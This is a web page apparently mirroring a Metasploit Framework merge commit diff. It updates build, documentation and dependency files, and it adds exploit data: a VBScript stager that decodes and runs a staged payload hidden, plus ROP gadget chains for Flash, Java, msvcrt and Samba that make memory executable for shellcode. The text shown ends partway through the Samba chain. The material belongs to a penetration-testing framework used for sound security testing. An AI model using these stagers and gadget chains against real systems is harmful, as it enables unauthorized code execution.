infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' into averagesecurityguy-master

unstable
sinn3r 2012-12-18 11:45:41 -06:00
parent f56ef52ffc 0344c568fd
commit 860ebbcfb1
2700 changed files with 128549 additions and 150807 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
.gitignore vendored
View File

@ -1,10 +1,23 @@
# Rubymine project directory
.idea
# RVM control file
.rvmrc
# YARD cache directory
.yardoc
# Mac OS X files
.DS_Store
# simplecov coverage data
coverage
data/meterpreter/ext_server_pivot.dll
data/meterpreter/ext_server_pivot.x64.dll
doc
external/source/meterpreter/java/bin
external/source/meterpreter/java/build
external/source/meterpreter/java/extensions
external/source/javapayload/bin
external/source/javapayload/build
# Packaging directory
pkg
tags
*.swp
*.orig

2
.rspec Normal file
View File

@ -0,0 +1,2 @@
--color
--format documentation

8
.travis.yml Normal file
View File

@ -0,0 +1,8 @@
language: ruby
rvm:
- '1.8.7'
- '1.9.3'
notifications:
irc: "irc.freenode.org#msfnotify"

33
CONTRIBUTING.md Normal file
View File

@ -0,0 +1,33 @@
# Contributing to Metasploit
## Reporting Bugs
If you would like to report a bug, please take a look at [our Redmine
issue
tracker](https://dev.metasploit.com/redmine/projects/framework/issues?query_id=420)
-- your bug may already have been reported there! Simply [searching](https://dev.metasploit.com/redmine/projects/framework/search) for some appropriate keywords may save everyone a lot of hassle.
If your bug is new and you'd like to report it you will need to
[register
first](https://dev.metasploit.com/redmine/account/register). Don't
worry, it's easy and fun and takes about 30 seconds.
## Contributing Metasploit Modules
If you have an exploit that you'd like to contribute to the Metasploit
Framework, please familiarize yourself with the
**[HACKING](https://github.com/rapid7/metasploit-framework/blob/master/HACKING)**
document in the
Metasploit-Framework repository. There are many mysteries revealed in
HACKING concerning code style and content.
[Pull requests](https://github.com/rapid7/metasploit-framework/pulls)
should corellate with modules at a 1:1 ratio
-- there is rarely a good reason to have two, three, or ten modules on
one pull request, as this dramatically increases the review time
required to land (commit) any of those modules.
Pull requests tend to be very collaborative for Metasploit -- do not be
surprised if your pull request to rapid7/metasploit-framework triggers a
pull request back to your own fork. In this way, we can isolate working
changes before landing your PR to the Metasploit master branch.

34
Gemfile
View File

@ -1,6 +1,30 @@
source 'http://rubygems.org'
gem 'rails', '3.2.2'
gem 'metasploit_data_models', '0.0.2', :git => "git://github.com/rapid7/metasploit_data_models.git"
gem 'pg', '>=0.13'
gem 'msgpack'
gem 'nokogiri'
# Need 3+ for ActiveSupport::Concern
gem 'activesupport', '>= 3.0.0'
# Needed for Msf::DbManager
gem 'activerecord'
# Database models shared between framework and Pro.
gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.3.0'
# Needed for module caching in Mdm::ModuleDetails
gem 'pg', '>= 0.11'
group :development do
# Markdown formatting for yard
gem 'redcarpet'
# generating documentation
gem 'yard'
end
group :development, :test do
# running documentation generation tasks and rspec tasks
gem 'rake'
end
group :test do
# testing framework
gem 'rspec', '>= 2.12'
# code coverage for tests
# any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
gem 'simplecov', '0.5.4', :require => false
end

68
Gemfile.lock Normal file
View File

@ -0,0 +1,68 @@
GIT
remote: git://github.com/rapid7/metasploit_data_models.git
revision: 73f26789500f278dd6fd555e839d09a3b81a05f4
tag: 0.3.0
specs:
metasploit_data_models (0.3.0)
activerecord
activesupport
pg
pry
GEM
remote: http://rubygems.org/
specs:
activemodel (3.2.9)
activesupport (= 3.2.9)
builder (~> 3.0.0)
activerecord (3.2.9)
activemodel (= 3.2.9)
activesupport (= 3.2.9)
arel (~> 3.0.2)
tzinfo (~> 0.3.29)
activesupport (3.2.9)
i18n (~> 0.6)
multi_json (~> 1.0)
arel (3.0.2)
builder (3.0.4)
coderay (1.0.8)
diff-lcs (1.1.3)
i18n (0.6.1)
method_source (0.8.1)
multi_json (1.0.4)
pg (0.14.1)
pry (0.9.10)
coderay (~> 1.0.5)
method_source (~> 0.8)
slop (~> 3.3.1)
rake (10.0.2)
redcarpet (2.2.2)
rspec (2.12.0)
rspec-core (~> 2.12.0)
rspec-expectations (~> 2.12.0)
rspec-mocks (~> 2.12.0)
rspec-core (2.12.1)
rspec-expectations (2.12.0)
diff-lcs (~> 1.1.3)
rspec-mocks (2.12.0)
simplecov (0.5.4)
multi_json (~> 1.0.3)
simplecov-html (~> 0.5.3)
simplecov-html (0.5.3)
slop (3.3.3)
tzinfo (0.3.35)
yard (0.8.3)
PLATFORMS
ruby
DEPENDENCIES
activerecord
activesupport (>= 3.0.0)
metasploit_data_models!
pg (>= 0.11)
rake
redcarpet
rspec (>= 2.12)
simplecov (= 0.5.4)
yard

8
HACKING
View File

@ -34,7 +34,7 @@ puts.
2. Don't read from standard input, doing so will make your code
lock up the entire module when called from other interfaces. If you
need user input, you can either register an option or expose an
interactve session type specific for the type of exploit.
interactive session type specific for the type of exploit.
3. Don't use "sleep". It has been known to cause issues with
multi-threaded programs on various platforms. Instead, we use
@ -48,7 +48,7 @@ the creation of ruby sockets and won't know how to clean them up in
case your module raises an exception without cleaning up after itself.
Secondly, non-Rex sockets do not know about routes and therefore can't
be used through a meterpreter tunnel. Lastly, regular sockets miss
out on msf's proxy and ssl features. Msf includes many protocols
out on msf's proxy and SSL features. Msf includes many protocols
already implemented with Rex and if the protocol you need is missing,
porting another library to use them is straight-forward. See our
Net::SSH modifications in lib/net/ssh/ for an example.
@ -121,8 +121,8 @@ development team. Note that this process requires a GitHub account.
For Git commits, please adhere to 50/72 formatting: your commits should
start with a line 50 characters or less, followed by a blank line,
followed by one or more lines of explanitory text wrapped at at 72
characters Pull requests with commits not formmated this way will
followed by one or more lines of explanatory text wrapped at at 72
characters Pull requests with commits not formatted this way will
be rejected without review.
For modules, note that Author field is not automatic, and should be

7
README.md
View File

@ -1,5 +1,5 @@
Metasploit
Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.png)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://codeclimate.com/badge.png)](https://codeclimate.com/github/rapid7/metasploit-framework)
==
The Metasploit Framework is released under a BSD-style license. See
COPYING for more details.
@ -40,10 +40,11 @@ reading some of the great tutorials online:
Contributing
--
See the [Dev Environment Setup][wiki-devenv] guide on github which will
See the [Dev Environment Setup][wiki-devenv] guide on GitHub which will
walk you through the whole process starting from installing all the
dependencies, to cloning the repository, and finally to submitting a
pull request.
pull request. For slightly more info, see
[Contributing](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).
[wiki-devenv]: https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Development-Environment "Metasploit Development Environment Setup"

47
Rakefile Normal file
View File

@ -0,0 +1,47 @@
require 'bundler/setup'
require 'rspec/core/rake_task'
require 'yard'
RSpec::Core::RakeTask.new(:spec)
task :default => :spec
namespace :yard do
yard_files = [
# Ruby source files first
'lib/msf/**/*.rb',
'lib/rex/**/*.rb',
# Anything after '-' is a normal documentation, not source
'-',
'COPYING',
'HACKING',
'THIRD-PARTY.md'
]
yard_options = [
# include documentation for protected methods for developers extending the code.
'--protected'
]
YARD::Rake::YardocTask.new(:doc) do |t|
t.files = yard_files
# --no-stats here as 'stats' task called after will print fuller stats
t.options = yard_options + ['--no-stats']
t.after = Proc.new {
Rake::Task['yard:stats'].execute
}
end
desc "Shows stats for YARD Documentation including listing undocumented modules, classes, constants, and methods"
task :stats => :environment do
stats = YARD::CLI::Stats.new
yard_arguments = yard_options + ['--compact', '--list-undoc'] + yard_files
stats.run(*yard_arguments)
end
end
# @todo Figure out how to just clone description from yard:doc
desc "Generate YARD documentation"
# allow calling namespace to as a task that goes to default task for namespace
task :yard => ['yard:doc']

BIN
data/armitage/armitage.jar
View File

Binary file not shown.

BIN
data/armitage/cortana.jar
View File

Binary file not shown.

40
data/armitage/whatsnew.txt
View File

@ -1,6 +1,46 @@
Armitage Changelog
==================
26 Nov 12 (tested against msf 16114)
---------
- Windows command shell tab is now friendlier to commands that prompt
for input (e.g., time command)
- [host] -> Meterpreter -> Access -> Escalate Privileges now shows all
the framework's new exploit/windows/local modules too
- [host] -> Shell -> Post Modules now shows the framework's unix/local
and exploit/linux/local modules
- Added Ctrl+I shortcut. Lets you choose a session to interact with.
- Added Steal Token button to Processes dialog.
- Armitage now asks Metasploit for a non-expiring authentication token.
This will prevent Armitage from losing its access to msfrpcd when you
put your computer to sleep or pause the VM running Metasploit.
- add_user and add_[local]group_user now show all of their output when
the -h flag is used to operate on a remote host.
- added a Delete menu to creds table. Right-click a cred to delete it
Cortana Updates (for scripters)
--------
- aliased &data_delete to &data_clear to match the documentation.
- &file_get, &loot_get, and &file_content no longer delete the remote
file when connected to a teamserver.
16 Oct 12 (tested against msf 15972)
---------
- Added port 5985 to MSF Scans list.
- Meterpreter -> Access -> Persistence sets ACTION option for you
- Changed how LHOST and LPORT are set globally to prevent Ruby
character encoding conversion error in the framework.
- Pass Session, Log Keystrokes, and Persist now query module info
in a separate thread (avoids a deadlock opportunity)
- Armitage now shows folder/URL in a popup dialog for environments
where JDesktop API to open them directly is not supported
- Check all credentials option now filters the list to avoid trying
a pair of credentials twice.
- Armitage's exploit payload selection now selects cmd/unix/interact
when appropriate.
- Explore -> Processes now works with Java Meterpreter again.
- MSF Scans feature now runs http_version against port 443
5 Sept 12 (tested against msf r15804)
---------
- Setup dialog now trims host, port, user, and pass fields.

BIN
data/exploits/CVE-2012-2516/template_mof.chm Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2012-2516/template_payload.chm Executable file
View File

Binary file not shown.

41
data/exploits/cmdstager/vbs_b64_sleep Normal file
View File

@ -0,0 +1,41 @@
echo Set fs = CreateObject("Scripting.FileSystemObject") >>decode_stub
echo Set file = fs.GetFile("ENCODED") >>decode_stub
echo If file.Size Then >>decode_stub
echo Set fd = fs.OpenTextFile("ENCODED", 1) >>decode_stub
echo data = fd.ReadAll >>decode_stub
echo data = Replace(data, vbCrLf, "") >>decode_stub
echo data = base64_decode(data) >>decode_stub
echo fd.Close >>decode_stub
echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("DECODED", 2, True) >>decode_stub
echo ofs.Write data >>decode_stub
echo ofs.close >>decode_stub
echo Set shell = CreateObject("Wscript.Shell") >>decode_stub
echo shell.run "DECODED", 0, false >>decode_stub
echo Wscript.sleep(1000 * 60 * 5) >>decode_stub
echo Else >>decode_stub
echo Wscript.Echo "The file is empty." >>decode_stub
echo End If >>decode_stub
echo Function base64_decode(byVal strIn) >>decode_stub
echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
echo For n = 1 To Len(strIn) Step 4 >>decode_stub
echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
echo If Not w2 Then _ >>decode_stub
echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
echo If Not w3 Then _ >>decode_stub
echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
echo If Not w4 Then _ >>decode_stub
echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
echo Next >>decode_stub
echo base64_decode = strOut >>decode_stub
echo End Function >>decode_stub
echo Function mimedecode(byVal strIn) >>decode_stub
echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>decode_stub
echo If Len(strIn) = 0 Then >>decode_stub
echo mimedecode = -1 : Exit Function >>decode_stub
echo Else >>decode_stub
echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
echo End If >>decode_stub
echo End Function >>decode_stub

BIN
data/exploits/cve-2012-5076/Exploit.class Executable file
View File

Binary file not shown.

BIN
data/exploits/cve-2012-5076/MyPayload.class Executable file
View File

Binary file not shown.

BIN
data/exploits/exec_payload.msi Executable file
View File

Binary file not shown.

BIN
data/exploits/splunk/upload_app_exec.tgz Normal file
View File

Binary file not shown.

BIN
data/gui/msfgui.jar
View File

Binary file not shown.

80
data/ropdb/flash.xml Normal file
View File

@ -0,0 +1,80 @@
<?xml version="1.0" encoding="ISO-8859-1"?>
<db>
<rop>
<compatibility>
<target>11.3.300.257</target>
</compatibility>
<gadgets base="0x10000000">
<gadget offset="0x00243043">POP EAX # RETN</gadget>
<gadget offset="0x006e3384">ptr to VirtualProtect()</gadget>
<gadget offset="0x0044a4aa">MOV EAX,DWORD PTR DS:[EAX] # RETN</gadget>
<gadget offset="0x003d54df">XCHG EAX,ESI # RETN</gadget>
<gadget offset="0x005f0b25">POP EBP # RETN</gadget>
<gadget offset="0x002ed0f1">jmp esp</gadget>
<gadget offset="0x003eb988">POP EBX # RETN</gadget>
<gadget value="0x00000400">0x00000400-> ebx</gadget>
<gadget offset="0x00662e60">POP EDX # RETN</gadget>
<gadget value="0x00000040">0x00000040-> edx</gadget>
<gadget offset="0x0058289d">POP ECX # RETN</gadget>
<gadget offset="0x00955ebe">Writable location</gadget>
<gadget offset="0x00414e84">POP EDI # RETN</gadget>
<gadget offset="0x004de801">RETN (ROP NOP)</gadget>
<gadget offset="0x0024044c">POP EAX # RETN</gadget>
<gadget value="nop">nop</gadget>
<gadget offset="0x00627674">PUSHAD # RETN</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>11.3.300.265</target>
</compatibility>
<gadgets base="0x10000000">
<gadget offset="0x00487414">POP EAX # RETN</gadget>
<gadget offset="0x006e338c">ptr to VirtualProtect()</gadget>
<gadget offset="0x00437d39">MOV EAX,DWORD PTR DS:[EAX] # RETN</gadget>
<gadget offset="0x0008f9c6">XCHG EAX,ESI # RETN</gadget>
<gadget offset="0x000baf77">POP EBP # RETN</gadget>
<gadget offset="0x002d8d5c">jmp esp</gadget>
<gadget offset="0x00005604">POP EBX # RETN</gadget>
<gadget value="0x00000400">0x00000400-> ebx</gadget>
<gadget offset="0x0064a4d7">POP EDX # RETN</gadget>
<gadget value="0x00000040">0x00000040-> edx</gadget>
<gadget offset="0x004087db">POP ECX # RETN</gadget>
<gadget offset="0x00955197">Writable location</gadget>
<gadget offset="0x005be57f">POP EDI # RETN</gadget>
<gadget offset="0x003a0002">RETN (ROP NOP)</gadget>
<gadget offset="0x00244a82">POP EAX # RETN</gadget>
<gadget value="nop">nop</gadget>
<gadget offset="0x004cbc7f">PUSHAD # RETN</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>11.3.300.268</target>
</compatibility>
<gadgets base="0x10000000">
<gadget offset="0x0012429b">POP ECX # RETN</gadget>
<gadget offset="0x006e438c">ptr to VirtualProtect()</gadget>
<gadget offset="0x00481a7d">MOV EAX,DWORD PTR DS:[ECX]</gadget>
<gadget offset="0x006ae8d7">XCHG EAX,ESI # RETN</gadget>
<gadget offset="0x000a6b69">POP EBP # RETN</gadget>
<gadget offset="0x002b95bb">jmp esp</gadget>
<gadget offset="0x0027f328">POP EBX # RETN</gadget>
<gadget value="0x00000400">0x00000400-> ebx</gadget>
<gadget offset="0x00686fe5">POP EDX # RETN</gadget>
<gadget value="0x00000040">0x00000040-> edx</gadget>
<gadget offset="0x0017e345">POP ECX # RETN</gadget>
<gadget offset="0x0092027a">Writable location</gadget>
<gadget offset="0x002a394a">POP EDI # RETN</gadget>
<gadget offset="0x00593802"># RETN (ROP NOP)</gadget>
<gadget offset="0x002447d1">POP EAX # RETN</gadget>
<gadget value="nop">nop</gadget>
<gadget offset="0x0062857d">PUSHAD # RETN</gadget>
</gadgets>
</rop>
</db>

27
data/ropdb/java.xml Normal file
View File

@ -0,0 +1,27 @@
<?xml version="1.0" encoding="ISO-8859-1"?>
<db>
<rop>
<compatibility>
<target>*</target>
</compatibility>
<gadgets base="0x7c340000">
<gadget offset="0x0000252c">POP EBP # RETN</gadget>
<gadget offset="0x0000252c">skip 4 bytes</gadget>
<gadget offset="0x0002c55a">POP EBX # RETN</gadget>
<gadget value="0x00000400">0x00000400-> ebx</gadget>
<gadget offset="0x00005249">POP EDX # RETN</gadget>
<gadget value="0x00000040">0x00000040-> edx</gadget>
<gadget offset="0x000011c0">POP ECX # RETN</gadget>
<gadget offset="0x00051897">Writable location</gadget>
<gadget offset="0x0000b8d7">POP EDI # RETN</gadget>
<gadget offset="0x00006c0b">RETN (ROP NOP)</gadget>
<gadget offset="0x00026fa6">POP ESI # RETN</gadget>
<gadget offset="0x000015a2">JMP [EAX]</gadget>
<gadget offset="0x000362fb">POP EAX # RETN</gadget>
<gadget offset="0x0003a151">ptr to VirtualProtect()</gadget>
<gadget offset="0x00038c81">PUSHAD # ADD AL,0EF # RETN</gadget>
<gadget offset="0x00005c30">ptr to 'push esp # ret</gadget>
</gadgets>
</rop>
</db>

56
data/ropdb/msvcrt.xml Normal file
View File

@ -0,0 +1,56 @@
<?xml version="1.0" encoding="ISO-8859-1"?>
<db>
<rop>
<compatibility>
<target>WINDOWS XP SP2</target>
<target>WINDOWS XP SP3</target>
</compatibility>
<gadgets base="0x77c10000">
<gadget offset="0x0002ee15">POP EBP # RETN</gadget>
<gadget offset="0x0002ee15">skip 4 bytes</gadget>
<gadget offset="0x0003fa1c">POP EBX # RETN</gadget>
<gadget value="0x00000400">0x00000400-> ebx</gadget>
<gadget offset="0x00040d13">POP EDX # RETN</gadget>
<gadget value="0x00000040">0x00000040-> edx</gadget>
<gadget offset="0x0002eeef">POP ECX # RETN</gadget>
<gadget offset="0x0004d9bb">Writable location</gadget>
<gadget offset="0x0001a88c">POP EDI # RETN</gadget>
<gadget offset="0x00029f92">RETN (ROP NOP)</gadget>
<gadget offset="0x0002a184">POP ESI # RETN</gadget>
<gadget offset="0x0001aacc">JMP [EAX]</gadget>
<gadget offset="0x0002b860">POP EAX # RETN</gadget>
<gadget offset="0x00001120">ptr to VirtualProtect()</gadget>
<gadget offset="0x00002df9">PUSHAD # RETN</gadget>
<gadget offset="0x00025459">ptr to 'push esp # ret</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>WINDOWS SERVER 2003 SP1</target>
<target>WINDOWS SERVER 2003 SP2</target>
</compatibility>
<gadgets base="0x77ba0000">
<gadget offset="0x0003eebf">POP EAX # RETN</gadget>
<gadget offset="0x00001114">ptr to VirtualProtect()</gadget>
<gadget offset="0x0001f244">MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN</gadget>
<gadget value="junk">Filler</gadget>
<gadget offset="0x00010c86">XCHG EAX,ESI # RETN</gadget>
<gadget offset="0x00026320">POP EBP # RETN</gadget>
<gadget offset="0x00042265">PUSH ESP # RETN</gadget>
<gadget offset="0x000385b7">POP EBX # RETN</gadget>
<gadget value="0x00000400">0x00000400-> ebx</gadget>
<gadget offset="0x0003e4fc">POP EDX # RETN</gadget>
<gadget value="0x00000040">0x00000040-> edx</gadget>
<gadget offset="0x000330fb">POP ECX # RETN</gadget>
<gadget offset="0x0004ff56">Writable location</gadget>
<gadget offset="0x00038a92">POP EDI # RETN</gadget>
<gadget offset="0x00037d82">RETN (ROP NOP)</gadget>
<gadget offset="0x0003eebf">POP EAX # RETN</gadget>
<gadget value="nop">nop</gadget>
<gadget offset="0x00046591">PUSHAD # ADD AL,0EF # RETN</gadget>
</gadgets>
</rop>
</db>

436
data/ropdb/samba.xml Normal file
View File

@ -0,0 +1,436 @@
<?xml version="1.0" encoding="ISO-8859-1"?>
<db>
<rop>
<compatibility>
<target>Debian Squeeze / 2:3.5.6~dfsg-3squeeze6</target>
</compatibility>
<!--
dpkg -l|grep libgcrypt
ii libgcrypt11 1.4.5-2 LGPL Crypto library - runtime library
b6977000-b69e8000 r-xp 00000000 08:01 160176 /usr/lib/libgcrypt.so.11.5.3
b69e8000-b69eb000 rw-p 00070000 08:01 160176 /usr/lib/libgcrypt.so.11.5.3
-->
<gadgets base="0">
<gadget offset="0x00004d44">pop ebx ; pop ebp ; ret</gadget>
<gadget offset="0x00071ad4">offset of .got.plt section</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x00063dbf">pop eax; ret</gadget>
<gadget offset="0x00071af4">mmap@got - 4</gadget>
<gadget offset="0x000166f7">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
<gadget offset="0x00009974">jmp eax</gadget>
<gadget offset="0x00004d41">add esp, 0x14 ; pop ebx ; pop ebp ; ret || mmap ret, skip overt mmap arguments</gadget>
<gadget value ="0x00000000">mmap arg : addr</gadget>
<gadget value ="0x00001000">mmap arg : size</gadget>
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
<gadget value ="0x00000000">mmap arg : off_t </gadget>
<gadget value ="0x00000000">junk to be skipped over</gadget>
<gadget offset="0x0006a761">pop edx ; inc ebx ; ret</gadget>
<gadget offset="0x00073000">edx = writable location, in GOT</gadget>
<gadget offset="0x0004159f">mov dword [edx], eax ; mov byte [edx+0x06], cl ; mov byte [edx+0x07], al ; pop ebp ; ret || save EAX (mmaped addr) in GOT</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x0005d4c3">xchg eax, edx ; ret || edx = MMAPed addr, dst in memcpy</gadget>
<gadget offset="0x00060a1a">pop esi ; ret</gadget>
<gadget offset="0x0005c01b">pop ebp ; pop ecx ; ret || ecx = esp</gadget>
<gadget offset="0x0003da28">push esp ; and al, 0x0C ; call esi</gadget>
<gadget offset="0x00063dbf">pop eax ; ret</gadget>
<gadget value ="0x0000005c">eax = value to add to esp to point to shellcode</gadget>
<gadget offset="0x000538c4">add eax, ecx ; pop edi ; pop ebp ; ret</gadget>
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x00055743">xchg eax, ebx ; ret || ebx = esp + XX == src in memcpy</gadget>
<gadget offset="0x00063dbf">pop eax; ret</gadget>
<gadget offset="0x00071b6c">memcpy@got - 4</gadget>
<gadget offset="0x000166f7">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
<gadget offset="0x00055743">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
<!-- set ecx to same value than edx -->
<gadget offset="0x0006e61f">xchg eax, esi ; ret || save eax</gadget>
<gadget offset="0x00063dbf">pop eax; ret</gadget>
<gadget offset="0x00072ffc">saved mmaped addr - 4</gadget>
<gadget offset="0x000166f7">mov eax, dword [eax+0x04] ; ret || eax = saved mmaped addr</gadget>
<gadget offset="0x0005c914"> xchg eax, ecx ; ret ; || edx = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
<gadget offset="0x0006e61f"> xchg eax, esi ; ret ; || restore eax</gadget>
<gadget offset="0x00060a1a">pop esi ; ret</gadget>
<gadget offset="0x00071ad4">esi = offset of .got.plt section</gadget>
<gadget offset="0x00008505">pop edi ; pop ebp **1** ; ret</gadget>
<gadget offset="0x00004d0c">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget>
<gadget value ="0x00000000">junk for ebp **1** </gadget>
<gadget offset="0x0005b68a">pushad ; ret || will ret on gadget (P) which was in edi</gadget>
<gadget value ="size">payload size</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>Ubuntu 11.10 / 2:3.5.8~dfsg-1ubuntu2</target>
<target>Ubuntu 11.10 / 2:3.5.11~dfsg-1ubuntu2</target>
</compatibility>
<!--
dpkg -l|grep libgcr
ii libgcrypt11 1.5.0-1 LGPL Crypto library - runtime library
b69e3000-b6a65000 r-xp 00000000 08:01 148828 /lib/i386-linux-gnu/libgcrypt.so.11.7.0
b6a65000-b6a66000 r**p 00081000 08:01 148828 /lib/i386-linux-gnu/libgcrypt.so.11.7.0
b6a66000-b6a68000 rw-p 00082000 08:01 148828 /lib/i386-linux-gnu/libgcrypt.so.11.7.0
-->
<gadgets base="0">
<gadget offset="0x000048ee">pop ebx ; ret</gadget>
<gadget offset="0x00082ff4">offset of .got.plt section</gadget>
<gadget offset="0x0006933f">pop eax; ret</gadget>
<gadget offset="0x000830a4">mmap@got - 4</gadget>
<gadget offset="0x0001a0d4">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
<gadget offset="0x00007d79">jmp eax</gadget>
<gadget offset="0x00005646">add esp, 0x1C; ret || mmap ret, skip overt mmap arguments</gadget>
<gadget value ="0x00000000">mmap arg : addr</gadget>
<gadget value ="0x00001000">mmap arg : size</gadget>
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
<gadget value ="0x00000000">mmap arg : off_t </gadget>
<gadget value ="0x00000000">junk to be skipped over</gadget>
<gadget offset="0x0006fe61">pop edx ; inc ebx ; ret</gadget>
<gadget offset="0x00084000">edx = writable location, in GOT</gadget>
<gadget offset="0x00046dcd">mov dword [edx], eax ; mov byte [edx+0x06], cl ; mov byte [edx+0x07], al ; ret || save EAX (mmaped addr) in GOT</gadget>
<gadget offset="0x00008532">xchg eax, ecx ; ret || ecx = MMAPed addr, dst in memcpy</gadget>
<gadget offset="0x000438ad">mov eax, ecx ; pop ebp ; ret</gadget>
<gadget value ="0x00000000">junk for ebp</gadget>
<gadget offset="0x000056e8">mov edx, eax ; mov eax, edx ; ret || edx = eax = ecx , after memcpy, ret on edx, ie mmaped addr</gadget>
<gadget offset="0x0006933f">pop eax ; ret</gadget>
<gadget offset="0x00084100">eax = writable location, in GOT</gadget>
<gadget offset="0x000048ee">pop ebx ; ret</gadget>
<gadget offset="0x00084100">ebx = writable location, in GOT</gadget>
<gadget offset="0x0004cccf">push esp ; add dword [eax], eax ; add byte [ebx+0x5E], bl ; pop edi ; pop ebp ; ret || edi = esp</gadget>
<gadget value ="0x00000000">junk for ebp</gadget>
<gadget offset="0x00020bad">mov eax, edi ; pop ebx ; pop esi ; pop edi ; ret</gadget>
<gadget value ="0x00000000">junk for ebx</gadget>
<gadget value ="0x00000048">esi = value to add to esp to point to shellcode</gadget>
<gadget value ="0x00000000">junk for edi</gadget>
<gadget offset="0x0001ffef">xchg eax, ebx ; ret</gadget>
<gadget offset="0x0000c39c">add ebx, esi ; ret || ebx = esp + XX == src in memcpy</gadget>
<gadget offset="0x0006933f">pop eax; ret</gadget>
<gadget offset="0x00083024">memcpy@got - 4</gadget>
<gadget offset="0x0001a0d4">mov eax, dword [eax+0x04] ; ret || eax = @memcpy</gadget>
<gadget offset="0x0001ffef">xchg eax, ebx ; ret || eax = src in memcpy , ebx = @memcpy</gadget>
<gadget offset="0x00004803">pop esi ; ret</gadget>
<gadget offset="0x00082ff4">esi = offset of .got.plt section</gadget>
<gadget offset="0x00007af3">pop edi ; pop ebp **1** ; ret</gadget>
<gadget offset="0x000104c5">(P) pop ebx ; pop esi ; pop edi ; ret || pop .got.plt in ebx (was pushed through esi with pushad)</gadget>
<gadget value ="0x00000000">junk for ebp **1** </gadget>
<gadget offset="0x0001fdfa">pushad ; ret || will ret on gadget (P) which was in edi</gadget>
<gadget value ="size">payload size</gadget>
</gadgets>
</rop>
<rop>
<compatibility>
<target>Ubuntu 11.04 / 2:3.5.8~dfsg-1ubuntu2</target>
</compatibility>
<!--
dpkg -l|grep libgcr
ii libgcrypt11 1.4.6-4ubuntu2 LGPL Crypto library - runtime library
b69f8000-b6a69000 r-xp 00000000 08:01 17571 /lib/i386-linux-gnu/libgcrypt.so.11.6.0
b6a69000-b6a6a000 r**p 00070000 08:01 17571 /lib/i386-linux-gnu/libgcrypt.so.11.6.0
b6a6a000-b6a6c000 rw-p 00071000 08:01 17571 /lib/i386-linux-gnu/libgcrypt.so.11.6.0
we arrive on rop chain with pop esp ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
4 first pops are after pop esp
-->
<gadgets base="0">
<gadget offset="0x00071ff4">ebx = offset of .got.plt section</gadget>
<gadget value ="0x00000000">esi = junk to be skipped over</gadget>
<gadget value ="0x00000000">edi = junk to be skipped over</gadget>
<gadget value ="0x00000000">ebp = junk to be skipped over</gadget>
<gadget offset="0x000641ff">pop eax; ret</gadget>
<gadget offset="0x00072010">mmap@got - 4</gadget>
<gadget offset="0x00017af7">mov eax, dword [eax+0x04] ; ret || eax = @mmap</gadget>
<gadget offset="0x00007f19">jmp eax</gadget>
<gadget offset="0x000046b1">add esp, 0x14 ; pop ebx ; pop ebp ; ret || mmap ret, skip overt mmap arguments</gadget>
<gadget value ="0x00000000">mmap arg : addr</gadget>
<gadget value ="0x00001000">mmap arg : size</gadget>
<gadget value ="0x00000007">mmap arg : PROT_READ | PROT_WRITE | PROT_EXEC</gadget>
<gadget value ="0x00000022">mmap arg : MAP_PRIVATE | MAP_ANON</gadget>
<gadget value ="0xffffffff">mmap arg : filedes </gadget>
<gadget value ="0x00000000">mmap arg : off_t </gadget>
<gadget value ="0x00000000">junk to be skipped over</gadget>
<gadget offset="0x0006abc1">pop edx ; inc ebx ; ret</gadget>
<gadget offset="0x00073000">edx = writable location, in GOT</gadget>
<gadget offset="0x00041b85">mov dword [edx], eax ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret || save EAX (mmaped addr) in GOT</gadget>
<gadget value ="0x00000000">junk to be skipped over</gadget>
